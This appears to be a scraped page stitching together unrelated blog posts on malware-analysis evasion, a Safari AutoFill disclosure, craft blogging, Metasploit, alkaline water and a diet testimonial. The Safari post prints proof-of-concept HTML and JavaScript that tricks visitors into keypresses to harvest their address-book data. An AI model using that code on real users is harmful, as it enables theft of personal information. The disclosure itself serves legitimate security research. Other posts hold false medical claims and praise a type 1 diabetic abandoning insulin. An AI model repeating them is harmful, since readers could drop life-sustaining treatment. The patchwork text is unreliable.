Woman And computer
Human And Computer

In situ Automated Malware Analysis

Labels: , , ,

Over the past few years there's been a growing trend for enterprise security teams to develop their own internal center of excellence for malware investigations. To help these folks along, there's been a bundle of technologies deployed at the network perimeter to act as super-charged anti-virus detection and reporting tools.

There's a problem though. These technologies not only tend to be more smoke and mirrors than usual, but are increasingly being evaded by the malware authors and expose the corporate enterprise to a new range of threats.

Earlier this week I released a new whitepaper on the topic - exposing the techniques being used by malware authors and botnet operators to enumerate and subvert these technologies. The paper is titled "Automated In-Network Malware Analysis".

I also blogged on the topic yesterday over on the Damballa site - here.

Cross-posting below...

Automated In-Network Malware Analysis

Someone once told me that the secret to a good security posture lies in the art of managing compromise. Unfortunately, given the way in which the threat landscape is developing, that �compromise� is constantly shifting further to the attacker�s advantage.

By now most security professionals are aware that the automated analysis of malware using heavily instrumented investigation platforms, virtualized instances of operating systems or honeypot infrastructures, are of rapidly diminishing value. Access to the tools that add sophisticated evasion capabilities to an everyday piece of malware and turn it into a fine honed one-of-a-kind infiltration package are simply a few hyperlinks away.

Embedding anti-detection functionality can be achieved through a couple of check-boxes, no longer requiring the attacker to have any technical understanding of the underlying evasion techniques.

Figures 1 & 2: Anti-detection evasion check-boxes found in a common Crypter tool for crafting malware (circa late 2008).

Throughout 2010 these �hacker assist� tools have been getting more sophisticated and adding considerably more functionality. Many of the tools available today don�t even bother to list all of their anti-detection capabilities because they have so many � and simply present the user with a single �enable anti�s� checkbox. In addition, new versions of their subscriber-funded tools come out at regular intervals � constantly tuning, modifying and guaranteeing their evasion capabilities.

Figure 3: Blackout AIO auto-spreader for adding worm capabilities and evasion technologies to any malware payload. Recommended retail price of $59 (circa August 2010).

Pressure for AV++

In response to the explosive growth in malware volumes and the onslaught of unique one-of-a-kind target malware that�s been �QA Tested� by their criminal authors prior to use in order to guarantee that there�s no desktop anti-virus detection, many organizations have embarked upon a quest for what can best be described as �AV++�.

AV++ is the concept behind some almost magical array of technologies that will capture and identify all the malware that slips past all the other existing layers of defense. Surprisingly, many organizations are now investing in heavily instrumented investigation platforms, virtualized instances of operating systems or honeypot infrastructures � all the things that are already know to have evasions and bypassing tools in circulation � despite the evidence. Has fear overcome common sense?

An area of more recent concern lies within the newest malware creator tool kits and detection methodologies. While many of the anti-detection technologies found in circulation over the last 3-4 years have matured at a steady pace, the recent investments in deploying automated malware analysis technologies within a targeted enterprise�s network have resulted in new innovations and opportunities for detection and evasion.

Just as the tactic of adding account lockout functionality to email accounts in order to prevent password bruteforcing created an entirely new threat (the ability to DoS the mail system by locking out everyone�s email account) so we see the development of new classes of threats in response to organizations that attempt to execute and analyze malware within their own organizations.

In a �damned if you do, and damned if you don�t� context, the addition of magical AV++ technologies being deployed within the borders of an enterprise network has opened the doors to new and enhanced evasion tactics.

To best understand the implications and dynamics of the new detection and evasion techniques being used by the criminals targeting businesses I�ve created a detailed white paper on the topic.

How to add Facebook Widgets to your Blog (aka Facebook Social Plugins)

Labels: , , ,

Heidi Burton - Making Strangers

Facebook has an array of widgets, buttons and badges for bloggers to play with, they are called Social Plugins. I love widgets especially when they help share my blog content to more people. If you look around this blog you will find one or two!   Some of the facebook plugins are a little too advanced, but the ones I've shown here can be easily added to your blog by simply copying the iframe code snippet and pasting it into the right place.Once you land on the plugin page you will simply have to add the url of your blog or specific blog post and customise the widget (it really is a piece of cake). Facebook then provides you with the code to copy into your blog.


  • To add a facebook widget to your Blogger side bar - Go to your blog dashboard and click on 'Design', then click add gadget in your desired location. Scroll through the optionsand click on " html/javascript " and simpy paste in the code snippet of your desired widget and save.It always sends your new widget to the top so drag the widget to the right place and remember to click save. (read this post if you need more places to add widgets)
  • To add a facebook widget into to a Post - Open up the post (new or edit) and click on the Edit Html tab.  Paste the snippet into the desired location. You can use the preview button to double check it's working ok before publishing. This is the same method for embedding a youtube clip or any 'code snippets' you come across.

Like Button Facebook Widget

It's really simple to add to a side bar or to a post, you just have to paste in a snippet of code.  People can quickly click like and share your blog link back to their facebook profile.  This is good as the link appears in the  users facebook friends stream and perhaps more importantly it creates a backlink to your site which is great for search engine optimisation (SEO).  I have also found that when searching on facebook, if lots of people have liked a page it shows a direct link to your blog.



Activity Stream Facebook Widget









The activity stream is a really useful way of showing your most popular posts. You can add the 'like button' to any post as described above and all the activity will be displayed here.  It also displays 'shares', when people use the share icons on your posts.  These share icons now come as standard with a blogger blog, you just need to switch them on (share buttons on blogger). You can also use add this like I do on CBuk to give people even more options.  You can customise this widget, taking away the header, changing the border colour.

Let me know how you get on and please click like on CBuk before you leave!



Submit your UK Craft Blog!

The Safari AutoFill hack LIVES!

Update: Live Demo available on ha.ckers.org (thanks @rsnake)

Remember the Apple Safari AutoFill vulnerability I disclosed at Black Hat USA a couple months ago? The hack where if a user visited a malicious website, even if they�ve never been there before or entered any personal information, they could have their name, address, work place, and email address exposed? The same issue where the disclosure process didn�t go all that well, but where Apple did manage to get a patch out the night before my presentation. Well, guess what!? It�s back! A little less automatic, but at the same time faster and more complete in the data exploitation. Before discussing the technical details some background is necessary.

On August 10, 2010 I emailed Apple product security explaining I thought their AutoFill patch (5.0.1) was incomplete. I also let them know of my plans to discuss the results of my research at this past AppSec USA conference. I received no immediate reply, auto-response or otherwise. So I decided to followup with another email a couple days later on Aug 13. Heard nothing back for a week. Then I get a phone call.

A gentlemen from Apple product security cordially introduces himself. We have a friendly and productive chat about what went wrong in the pre-BlackHat disclosure process and how it�ll be improved. We�re about to drop off the call when he asks that if I find any more issues to please email the product security address. That�s when it hit me! He didn�t know that I HAD recently disclosed another issue, the patch breaker, and no one replied. After cluing him in I forwarded over the email thread. The same evening I received a note from Apple apologizing for the lack of communication and stating that they are on top of it. Great.

We exchange a few ideas about potential solution. The challenge is without losing browser functionality that Apple would prefer keep implementing a solid fix is going to be difficult. Fortunately for security conscious users a patch isn�t necessarily required to protect themselves. Just disable the AutoFill feature, which is HIGHLY recommended! What Apple�s plan is to address the issue I have no idea. Anyway without receiving any objection I went ahead and demonstrated the problem to the AppSec audience. I took their pin-drop silence as a sign that they were impressed.


As before the AutoFill feature (Preferences > AutoFill > AutoFill web forms) is enabled by default in Safari v5. When form text fields have specific attribute names such as name, company, city, state, country, email, etc. AutoFill is activated when a user types the first character of the real value in the "Me" card. Like the first character of your first name, in my case �J.� These fields are AutoFill�ed using data from the users personal record in the local operating system address book. While actively in AutoFill mode a user may press TAB to have all other entries automatically filled out. That�s the functionality we�re going to take advantage of.

<* form>
Name: <* input name="name" id="name">
Company: <* input name="company" id="company">
City: <* input name="city">
State: <* input name="state">
Email: <* input name="email">
Phone: <* input name="phone">
Street: <* input name="street">
Country: <* input name="country" id="country">
Zip: <* input name="zip">
Query: <* input name="q">
Month: <* input name="month">

To perform our attack requires tiny bit of end-user trickery. Two button presses to be precise. A malicious website detects (ie: IP address) the country the victim is from. For our purposes here we'll assume the "US." The attacker invisibly (CSS transparency) sets up the aforementioned form and forces the keystroke focus into the country element. Notice how this is done in the video on the right side of the screen, which only visible for demonstration purposes. Next the attacker entices the victim to type "U" (first character of "US") and then press "TAB.� And BAM! That�s it! Data stolen.



My example uses a very contrived "to play the game" trickery, but this process can be achieved many other ways. The point is once these keys are pressed the victims personal information leaves the browser and they are none the wiser. To be clear, I picked the "country" field as the target, but really any of the "Me" card fields will do with the appropriate first character being pressed.



VIDEO DEMO



var pressU = "Pretend you are playing an online game, where the first thing you must do is press \"U\" to jump.

Go ahead, press \"U.\"";

var pressTAB = "Next, press TAB.

You know, to get more options.";

function startGame() {
var instructions = document.createElement('div');
instructions.id = "instructions";
instructions.style.width = "550px";
instructions.style.height = "500px";
instructions.style.border = "3px solid #CC9933";
instructions.style.backgroundColor = "#FFCC66";

document.body.appendChild(instructions);
instructions.innerHTML = pressU;

var input = document.getElementById('country');
input.addEventListener("keydown", function(e) {
if (instructions.innerHTML == pressU) {
if (e.keyCode == 85) {
instructions.innerHTML = pressTAB;
} else {
e.preventDefault();
}
} else if (instructions.innerHTML == pressTAB) {
if (e.keyCode == 9) {
instructions.innerHTML = "Thank you for Playing! ;)

";

var data = document.getElementById('data');

setTimeout(function() {

for (var i = 0; i < data.elements.length; i++) { var n = data.elements[i].name; var v = data.elements[i].value; instructions.innerHTML += n + ": " + v + "
\n";
}

}, 200);


} else {
e.preventDefault();
}
}

}
, false);

input.focus();

document.addEventListener("click", function(e) {input.focus();}, false);

}

Scoutle

Labels: ,

Welcome to Scoutle! The free automated social network for bloggers to help find, promote, connect and rate blogs. Finally, get the recognition your blog deserves. 

Sounds exciting doesn't it! I stumbled across Scoutle recently and  I really like the concept, it's still in beta at the moment (that means it's not quite perfected yet) so it will be interesting to see how it develops.  You register your blog and make up a scout, mine are called Mr Craft-Blog and Mr Happy.  The scout wonders around the internet promoting your blog and finding interesting blogs for you.  I'm hoping he'll find me some new UK craft blogs.




It's essentially another social network, but just for bloggers, finding like minded bloggers to befriend through automatic matchmaking.  A blog dating agency if you like!  My account is about an hour old so I haven't had any 'matches' yet - apparently it takes 24 hours.  It will be interesting to see whether it has any effect on my blog traffic - I'll post an update in a few months.  I've added a scoutle 'stage' to this blog (scroll right down to the footer) and to my haptree blog ,  I've also created a Folksy network and a Craft Bloggers network, in the common interest / hobbies and crafts category.  They have 1 member each (me), so if you are already a member or you deside to register please join  :)

 That's all for now on 'Scoutle' until I start to see some results, let me know if you find any interesting blog promotion sites.  I've just applied to be a member of Seeded Buzz, I'll review it if I get accepted - have any of you heard of it?

Submit your UK Craft Blog!

Craft Blogs Update - New Submissions

Labels: , , ,

Hello Everybody!

Thanks for all of your recent craft blog submissions, it's been quite a deluge but I've caught up to emails submissions, just 20 or so to go (phew!).  I'll be adding links to facebook and twitter with these new blogs added over the next few weeks but I thought I'd list the craft blogs that I've added today, which bring CBuk up to 615 blogs listed in this crafty directory! I hope you all find some new and interesting crafting blogs to follow. To Submit Your Blog! - Click here


A pile of gorgeous pillows


575 Fuel for Body and Soul http://fuelforbodyandsoul.wordpress.com sewing & textiles
576 Aeris design http://www.aeris-designs.blogspot.com jewellery
577 Sweet Cotton Threads http://sweetcottonthreads.blogspot.com/ sewing & textiles
578 Lavender Stamper http://lavender-stamper.blogspot.com papercrafts
579 Bedecked Beads UK http://www.bedeckedbeadsuk.blogspot.com/ Jewellery
583 The Ramblings of a Middle aged Crafter www.theramblingsofamiddleagedcrafter.blogspot.com papercrafts
584 Carina at Home www.carina-at-home.com more
587 Elle Thornton Designs www.ellethornton.blogspot.com sewing & textiles
588 Nins and peedles http://nins-and-peedles.blogspot.com/ sewing & textiles
589 Foil Play http://foilplay.blogspot.com/ papercrafts
590 The Finished Spool http://www.thefinishedspool.com/blog/ sewing & textiles
591 Jinja Jewellery http://jinjajewellery.blogspot.com jewellery
592 Lily Melba www.lilymelba.blogspot.com art & design
593 Made with love by Mandy http://madewithlovebymandy.blogspot.com sewing & textiles
594 Helen Rose Glass www.helenroseglass.blogspot.co.uk more
595 Sally Young http://sally-young.blogspot.com/ sewing & textiles
596 Coffee n Crochet www.coffeencrochet.blogspot.com Knitting & Crochet
597 Handmade by Freya http://handmadebyfreya.wordpress.com sewing & textiles
598 Judes Creative Space http://www.judes-creative-space.com/ art & design
599 Hamespun http://hamespun.blogspot.com/ more
600 Chasing Beads http://chasing-beads.blogspot.com/ jewellery
601 Cass Holmes www.casholmes.blogspot.com sewing & textiles
602 The Mosaic Garden www.themosaicgardenuk.blogspot.com More
603 Booties by Dannie http://bootiesbydannie.blogspot.com Knitting & Crochet
604 Made by Lolly http://thoughtsbylolly.blogspot.com/ More
605 Susie Dolls www.susie1205.blogspot.com more
606 Wuchi by Maks http://wuchibymaks.blogspot.com/ More
607 Zaks Jewel http://zaksjewel.blogspot.com/ jewellery
608 Handmade by Tigerlily http://handmadebytigerlily.blogspot.com/ Knitting & Crochet
609 The World of Laura Hambleton http://laurahambleton.blogspot.com sewing & textiles
610 By My Fair Hand http://bymyfairhand.blogspot.com/ sewing & textiles
611 Two for Joy Design www.twoforjoydesign.blogspot.com sewing & textiles
612 Curiosities of Ruth Moore http://curiositiesofruthmoore.blogspot.com/ jewellery
613 Izabela its Me http://izabelaitsme.wordpress.com Knitting & Crochet
614 Excell Crafts http://excellcrafts.blogspot.com sewing & textiles
615 Fat Chick Design http://chirpychirpycheapcheap.blogspot.com/ sewing & textiles

Intel Pentium Processor "Performance Upgrade"

Labels: , , ,

Catching up with some of the RSS feeds I monitor earlier today I came across some chatter about the newly launched/noticed upgrade option for Intel processors. Specifically, the $50 upgrade option to the new Pentium G6951.

So whats all this about? Apparently, the new processor can be "upgraded" by purchasing what amounts to a license key for turning on the embedded functionality of the chip. Or, to put it another way, you've purchased a PC with a downgraded Pentium processor with disabled features - but can "enable" those features at a later date by simply purchasing the aforementioned "upgrade card".

There's a lot of fervor concerning this particular innovation from Intel. Granted, the concepts aren't particularly new and other technology companies have tried similar tactics in the past (e.g. I was once told that the IBM Z-Series mainframes ship with everything installed but, depending upon the license you purchased, not all the capacity/features of the system are enabled), but It's not something I'm a particular fan of. Then again, it would seem to me that I'm probably not the type of consumer that Intel would be marketing this product strategy to either.

The Intel site describing the upgrade technology/processes/etc. can be found at http://retailupgrades.intel.com/ - although it does appear to still be in a state of "under construction" as evidenced with the following response to the FAQ question of "Which PC's with this upgrade work on?"


Good luck with this one Intel. It's not like I'll be buying any product (Intel or other) knowing that it had been intentionally disabled and subject to an additional fee for activation.

The exception would be if I felt like doing a bit of RE to get the full functionality without buying in to the whole marketing "vision" (subject to license agreements, yadda, yadda, yadda...).

Musings on Metasploit

Labels: ,

The week before last I attended and spoke at the OWASP AppSec 2010 conference on the first day, meanwhile HD Moore spoke on the second day.

It's always fun to watch HD Moore as he covers the latest roadmap for Metasploit - explaining the progress of various evasion techniques as they're integrated in to the tool and deriding the progress of various "protection" technologies.

A couple of things he said at the time stuck in my mind and I've been musing over them throughout last week. One comment - in response to a question that had been raised - was that IDS/IPS evasion is already sufficient within Metasploit and that further techniques would be "like kicking a cripple kid". Granted, not very PC - but that's the purpose of such statements.

I agree to a certain extent that IDS/IPS technologies can be evaded - but there's a pretty broad spectrum to IDS/IPS technologies and 'one size doesn't fit all'. For example, HD Moore mentioned that simply using HTTP compression (i.e. GZIP) is enough to evade the technology. Not so. For IDS/IPS technologies with full protocol parsing modules (rather than packet-based signature matching) such techniques won't work. But that's by the by. Depending upon the sophistication of the attacker and their knowledge of the strengths and weaknesses of the IDS/IPS technology, evasions can often be found in short order (depending upon the type of vulnerability being exploited). While it's obviously to HD Moores advantage to talk a good game on behalf of Metaspolit and novel evasion techniques, it doesn't hurt to be reminded that there is an agenda to making such broad claims.

The other comment he made related to the progress of adding more advanced payloads and exploit techniques. While I can't remember precisely the terms he used, the way he was discussing the topic - how much fun everyone was having inventing and developing the new techniques - I couldn't help by feel a little ashamed that things within the professional (attack-based) security field had reached this level.

What do I mean? Well, the way in which HD Moore was describing things to the audience I couldn't help but think in terms of physical weapons research. The description of the nestled exploit and evasion modules and how the developers/researchers were going about developing better, faster and more efficient techniques made me visualize a game of one-up man-ship between bullet designers. Something like the following...

Researcher 1: I think we should make a bullet that's Teflon coated but acts like a dum-dum bullet that expands to make a bigger hole in the target.

 Researcher 2: No, I've got a better idea. Instead of using the dum-dum style of bullet, I've come up with a way of making it fragment quicker and completely eviscerate the target internally.

 Researcher 1: How about we add that new flaming compound so that as the target gets eviscerated he'll combust at the same time.

 Researcher 2: That's cool! I bet there'll be crimson smoke coming out of the target too.

 Researcher 1: Ha ha. Cool! Lets build it and test it against those homeless people across the road.
I'm guessing you're thinking that I'm perhaps a little warped in thinking these kinds of things (and for writing them down). But it's something that sprung in to my mind at the time and again last week. How much is too much?

Granted, "good enough" protection can be defeated by using a "good enough" evasion technique. But I wonder when (or if) we'll ever need people to be more responsible for their actions developing what are effectively the cyber-equivalent of weapons? I strongly doubt that there'll ever be the cyber-equivalent of the Hague Convention though.

Is There A Need For Hydrochloric Acid In The Stomach?

Last week Dr. Joseph Mercola made several statements concerning the negative affects of drinking alkaline water.

According to Dr. Mercola drinking alkaline water is of no value because it will be minimized by the hydrochloric acid of the stomach.

That's exactly the point Mercola! You want to minimize the hydrochloric acid residues in the stomach!!!!

Of course what Mercola does not explain is the biochemistry of the digestive system and especially the stomach. The facts are that for every molecule of hydrochloric acid produced in the stomach an equal amount of sodium bicarbonate is produced by the cover cells. The equation is as follows: NaCl + H20 + CO2 = NaHCO3 + HCL.

The stomach pulls sodium, chloride, water and carbon dioxide to make sodium bicarbonate, an alkalizing compound with the waste product of hydrochloric acid.

The stomach will always produce sodium bicarbonate to alkalize the food we eat or the liquids we drink to prepare the food and drink for biological transformation into stem cells in the crypts of the small intestine. The more acidic the food or drink the more sodium bicarbonate will be produced to buffer the acids of the food or drink. This of course leaves you with a belly full of acid which leads to all sorts of stomach disorders including the acidifying of the blood and then tissues.

The stomach does not need to produce any sodium bicarbonate when we are eating or drinking alkalizing foods or alkaline drinks, including electron rich alkaline water.

The key here to remember is this: the stomach is NOT an organ of digestion but an organ of contribution and its main contribution is to alkalize the food and drink we ingest.

You want to drink electron rich alkaline water to neutralize or buffer the hydrochloric acid in the stomach.

The stomach is NOT an organ of digestion but an organ designed to alkalize the acids from food and metabolism.

Bottom-line the best thing you can do to support the stomach is to drink electron rich alkaline water with a pH of at least 9.5 or better. You will be preventing serious stomach disorders and preparing the food and drink for its ideal pH in the small intestine at 8.4 for biological transformation into stems cells in the crypts of the small intestine.

My best advise is to drink at least 1 liter of 9.5 pH alkaline electron rich water for every 50 pounds of weight. You will be hydrating, alkalizing and energizing your body. There is nothing more important than drinking alkaline electron rich water other than the oxygen you breath.

Engage Blog Readers Using Twitter

Labels: , , ,

How do you use twitter to promote your blog in a more exciting way?

I just read an article over at problogger that has inspired me to write a new post - thanks to Georgina Laidlaw who wrote the original post. Georgina talks about how many bloggers are using twitter in a very mechanical way to just tweet out links or the opening lines of our blog posts. I know I'm guilty of this, so what can we do about it?
Leather and Lace Leaf necklace  

Twitter is changing and will be adding new features very soon, so maybe it's time we changed how we tweet about our craft blogs to really engage our followers and help to spread the word about our beautiful hand-crafts.

As craft bloggers sometimes the kind of techy or corporate advice from problogger and other social media experts can seem very far removed from our friendly crafty blogs.  However, if you want your blog to be found by others and your handmade products or crafting supplies to sell, then your marketing strategies have to be effective.

To help you all capitilise on the good advice from Georgina's post, I thought I'd talk about how it can be applied to your craft blog in order to help increase subscribers and traffic to your blogs. I've used the original bullet points from the problogger post. 

Tell the story of blog content creation
Georgina talks about asking fellow tweeters for input into the post you are writing in order to pique their interest.  Getting people involved in the creation of your blog content will ensure they visit, read and share the final product.

Maybe you could ask tweeters to help you design a piece.  You could blog various options over a period of a week, offering pictures of swatches, sketches, stitch types, sizes - by the end of the week your readers will have created the piece for you and will feel like they have learnt about your processes and the decisions and care you take with each piece of your creative work. (and it will have been alot of fun!)
Cute House Clutch Purse
Another crafty application of this idea would be tweeting for help with creating a treasury, like a Folksy Friday. Or simply starting up a converstation and asking your followers to help you brainstorm post ideas.


Tweet interesting comment responses
This is a great idea that really doesn't need much explanation. Tweeting peoples responses is a great way of showing not only that you appreciate the effort that people have taken to comment but also it is a subtle way of inviting comments from more of your social network. Lots of comments doesn't make a good blog but lots of really interesting comments, discussions and additions to your post does make for a good, engaging read. Tweeting comments will encourage this kind of interaction with your blog posts.


Run a Twitter competition tie-in
This is fairly well covered ground in the craft world - we all love a good giveaway! I used to run 'giveaway HQ' on my personal blog and it was so popular, but alot of work keeping it updated as there were so many giveaways being submitted!

Georgina recommends setting a quiz for followers to have to find the answers within your posts - much more fun than the 'please follow me I'll have a giveaway when I get to 200 blog followers' type tweets. More like a bloggy treasure hunt. You could still make blog folowing or subscribing to your mailing list a requirement.

Create a Twitter conversation around an event
Georgina talks about creating events around product launches - again with crafting a product launch sounds a bit grand but we really need to celebrate our new designs in this way rather than 'I listed a new xyz on folksy'.

Write posts which discuss how you got to the design, your influences and any snags you came accross. Show sketches and the process along the way, build up to the finished piece rather than simply snapping it once and posting I made this today. You did much more than that!

Tag your posts carefully so you can link to this collection of design ideas. Schedule a blog post for a time when you think your followers are usually online and let people know that it's scheduled to go live at 8pm on Sunday evening for example. Remind them about the big reveal through the weekend to really ramp up the excitement and hopefully maximise the tweets, comments and blog views you will receive. Don't do this too often!

I'd love to know how you get on :)

New Twitter!

Labels:

A brand new look for twitter! 





Ooooh new Twitteriness!

My advice on this if you are pushed for time is to slide the slider along to 1 minute. If you actually want to know whats going on read this - http://blog.twitter.com/2010/09/better-twitter.html It looks good, although I use tweetdeck because I have 3 twitter accounts and with tweetdeck I don't have to log in and out.

From the video it seems there will be continuous scrolling through your timeline and a much nicer way to view videos and twitpics froms peoples tweets without leaving twitter. They have created a split screen effect. I also like the look of the tabs across the top of the timeline section, so you can switch to mentions, searches and retweets easily. I wonder how it will change your twitter background image on your profile? Can't wait to have a go!

x Hilary

Reversing High Blood Pressue, High Cholesterol, Obesity and Type 1 Diabetes


Subject: Re: The pH Miracle Lifestyle and Diet

Dear Dr. Young,

I started the pH Miracle Lifestyle and Diet on the evening of July 25, 2010.
Roma, my former wife & I met in St.Louis on the 16-19 of July.
It was the first time we had seen each other in 11 years.
On the 20th I was back in Nashville.
Roma ask me to comeback the 23-26 of July.
While I was in St.Louis, Anne Marie & her husband,Jonathan called to ask Roma to come up to their home in Iowa, since she was so close by in St.Louis.
Roma lives in Maui, Hawaii, they had met & became friends when Anne Marie & Jonathan were visiting the island.

She said she would come up if Anne Marie would see me professionally.
We arrived on the afternoon of July 25th, 2010,we met them at the Guru Purnama Celebration on campus at M.U.M.(Maharishi University of Management).

I was happy to be at M.U.M. because I have been doing T.M.(Transcendental Meditation) for 36 years.

We stayed with them & they fixed dinner for us that night.
The next day we ate with them before my appointment.
I enjoy the pH Miracle Diet food they prepared.

I had my microscopy live blood cell & MOST analysis done at 3:00 P.M. on July 26, 2010 with Anne Marie.

Anne Marie advised me that since I was taking such large amounts of insulin that it might take some time before getting any positive results.

I was taking a shot of 56 units of Insulin NPH 100 Unit / ML Novolin N, twice daily, every 12 hours.
Also, I was taking a shot of 10 to 20 units of Insulin,Aspart 100/ML Novo, 6 times a day, with 3 meals,2 snacks & bedtime.
In addition, I was taking Metformin HCL 1000 mg. Tab, 2 times a day. This the maxmium dosage allowed.

Plus, I was taking : for high blood pressure,10 mg, half a tablet of Lisinopril 20 Mg Tab 1 a day.
for high cholesterol,40 mg., half a tablet of Simvastatin 80 Mg Tab 1 a day.
for frequent urination,4 mg of Tolterodine Tartrate 4 Mg SA Cap / Detrol LA, 2 times a day & 5 mg, half a tablet of Zolpidem Tartrate 10 Mg Tab, 1 a day.

My type 1 diabetes was so bad that in the spring of 2005, I was rushed to the E.R. with a blood sugar over 600.
The next 3 years it was in the high 200s & 300s.
In the last 2 years with the help of 8 shots a day, my blood sugar has been in the high 100s & 200s.
My doctors told me as a result of years of high blood sugar, I developed neuropathy (nerve damage) in my toes/feet, & once the nerve is dead it will never regenerate.
Finally, I was scheduled for botox injuctions in my bladder to end the nightmare of having to get up every hour to urinate every night for the last 2 years.

I had not had any rem sleep in over 2 years, I was constantly exausted & none of the medications worked.

Anne Marie advised me to stay on my medications, but to be sure to check my blood sugar more often because I might need less insulin.

Being an ordained minister I have always trusted my intuition.
The morning of the 27th of July I stopped taking all insulin & I stopped taking Metformin.
The morning of the 29th of July I stopped taking the Lisinopril.
The morning of the 30th of July I noticed that I felt the pads of my toes for the 1st time since 2001.
The evening of the 31th of July I stopped taking the Simvastatin, Detrol LA, & Tolterodine Tartrate.
I am cancelling the botox injections because I am now sleeping through the night !
I have been drug free since the 31st of July.

I am a veteran, I get my medical care at the Veterans Hospital in Nashville, Tennessee.
My 1st appointment since becoming drug free was with Donna, my dermatologist at 1:20 P.M. on August 3, 2010.

She said that I looked great, better than she had ever seen me before.
She said that it looked like my skin was glowing
.
My 2nd appointment was with my endocrinologist, Dr. Niswender at 10:30 A.M. on August 12, 2010.

He said that my blood sugar looked wonderful & that my blood pressure was normal, 124/70.

He said that the last time I saw him I weighed 258 lbs. & on that day I weigh 237 lbs.,a loss of 21 lbs.

He ask me how much insulin was I taking ?
I told him none.

He couldn't believe it.

He ordered a complete blood work.
After seeing the results he was stunned.

He said that my blood sugar should be between 80 -120 & that for the first time I was averaging that.

He said that I didn't need to ever come back to see him, but he ask me to come back in 4 months to make sure the results are permanent.

My blood sugar :

7/25/2010 137
7/26/2010 156
7/27/2010 68
7/28/2010 87
7/29/2010 126
7/30/2010 129
7/31/2010 114
8/01/2010 119
8/02/2010 126
8/03/2010 122
8/04/2010 109
8/05/2010 110
8/07/2010 82
8/08/2010 113
8/09/2010 131
8/10/2010 142
8/11/2010 125

Now, my average blood sugar is around 100.

My 3rd appointment was with my internal medicine specialist, Dr. Sastre at 11:30 A.M. on August 17, 2010.

She said all my vitals looked great & not to come back for 8 months.

She said that my cholesterol level is now completely in normal range.

I am drug free & feeling great !

I am grateful to Roma for getting me there.

I am very grateful to Anne Marie, Dr. Patrick Sobota & Dr. Robert Young & Shelley.
You help save my life !

I continue to lose weight. I now weight 230 lbs, a 28 lbs loss.
I have the energy of a teenager !
I have started jogging for the 1st time in 3 decades.
My life is wave after wave after wave of bliss !

It was the perfect synergy of events : reconnecting with my former wife,Roma, reconnecting with M.U.M. for Guru Purnama, reconnecting with my spiritual mentor,Jerry Jarvis, 36 years of meditation, having Anne Marie do the consultation,learning the diet and doing the diet, & follow up with Anne Marie & Dr. Patrick Sobota.

Thank you all !!!

I believe that my healing is the result of many years of prayer & yes my prayers were answered when God lead me to Dr. Robert Young & his team !!!


Gratefully Yours,,
Rev. John Copeland

P.S. my website is www.christchurch.webs.com ; .

Craft Blog UK - Handpicked

Labels: , , , ,

Just click on the blog headers to enjoy some great crafty bloggers. I've chosen just a few from the categories in the blog directory! I'll select a few more next week!






Blogging Tips to Improve your Craft Blog!

Labels: , , , , ,

Pear, plate and sketches
Jude Allman
Lots and lots of links to follow below containing all of the best posts on Craft Blog UK to help increase views and followers to your craft blog. If you enjoy these posts please share them! You can find CBuk on facebook , on twitter and at Flickr too :)






Perhaps you've just filled up your online shop and now your twiddling your thumbs and looking for a way to promote it! Here is a guide to the nuts and bolts of starting a craft blog (you'll love it, blogging is so much fun!)


Blogger in Draft enables you to change the layout of your blog, footers, 3 columns, side bars with no html whatsoever!  

In this post I share how to promote your Folksy Fridays, Misi Mondays and Etsy Finds as well as how to get a great looking post using the 'haptree mini treasury template' 

Tagging on facebook will mean that your posts reach alot more people (and that's the idea, right!?)


Do you think you are following too many blogs? Never! It's just a case of organising them, don't ever miss out on your favourite blog authors posts again. 


We all get a little bit stuck sometimes when it comes to thinking up ideas for new posts - if you have craft bloggers block or your looking for some new ideas to spice up your blog take a look at these 10 tips!


If you are undecided as to whether to make the leap into the world of blogging then look here for 10 really positive reasons to take the plunge.


The Blog List or Blog Roll is a very straighforward little gadget that can add lots of interest to your blog.  It uses an RSS feed and automatically updates when the blogs you have included have new posts added, but there is a lot more to this basic gadget than you think.

Adding a link/navigation bar to your blog - you know the horizontal bar below your header that helps you sort out all your posts into really cool organised sections - learn how to add this and link to labels within your posts.

Home, Contact, About me get all of those useful tabs on your blog without touching the html template !

@ symbols, hash tags #, follow fridays and how to get more followers!  Twitter can be a real minefield but with this comprehensive guide you'll understand how to use it to your advantage and get more readers to your blog.

Way better than an Etsy Mini in so many ways!  Your stuff scrolling through and clicking direct to your shop and you don't even have to upload all your pics anywhere!  MORE!

Add a lovely background colour to your blog posts - a different colour for every post or just highlight certain areas of your posts to give them more impact - just like I have here!  

Tips from CBuk author haptree  - you need good photos for succesful blogging so here is a link to loads of useful tips to improve your photographs.  

Make a badge for blog swapping and learn how to post the code onto your blog so that your readers can 'grab' it for their blog. 


Have you ever wanted to leave a blog comment on a blogspot blog that is actually clickable, learn how to add a hyperlink to a blog comment so that people can click straight trough to your site. 

Exactly that, let your facebook fan page or profile be automatically updated when you blog.  

Craft Blogs, A list of UK Sewing Blogs, Knitting Blogs, Jewellery Blogs and more!

Labels: , , , , , , , , ,

Craft Blog UK is a growing list of blogs all about the things that people make. There are so many talented writers and makers in the UK! Just take a look through a few of these fantastic blogs.

Springtime Brooch
Felted Storage Basket
birds and bees bracelet
blue owl frame
List Maker's notebook - olive
Pine Tree Plaques
I Love Folksy

Craft Blog UK!

Craft Blog UK is a directory of UK craft blogs. The directory was launched at the end of January 2010 and now has over 500 British craft blogs listed (and it's growing by the day!). You will  love this directory if you are interested in beautiful handmade items and the fascinating lives of the crafters who make them. I hope you enjoy browsing through (and learning from) all the wonderful uk blogs listed in the Craft Blog UK directories.   The blogrolls in the sidebars of CBuk will give you a little taste of the most recent blog posts from our members, they show just the 5 most recent posts from each category.

Infinite Malware & Infinite Protection?

Labels: , ,

Infinite detection of malware? In Sophos' blog entry "To infinity and beyond" it's pointed out that there's an infinite number of malware threats (and that there'll be more tomorrow). It's also implied that customers are protected against these infinite threats by infinite detection capabilities - which is obviously taking the theme in to some far-flung infinite parallel universe with infinitely better anti-virus solutions that we have in our particular reality.

Nevertheless, their perspective of infinite malware is quite correct. Given that malware can by dynamically generated (checkout the paper on x-morphic attack engines), exhibit polymorphic capabilities and is generally created faster than it can be counted, captured and cataloged, then for all intents and purposes it is infinite.

Which means I have to chuckle when I hear or read any media coverage about the number of malware a particular vendor has captured and written detection signatures for. It's like saying "look, I tripped over 2,543,234 pieces of malware around the world last year and developed protection of each of them". Then, with my mathematicians hat on... infinite threats minus 2,543,234discovered threats still leaves an infinite number of threats. Or, expressing detection coverage as a percentage of scale of the threat = zero percent.

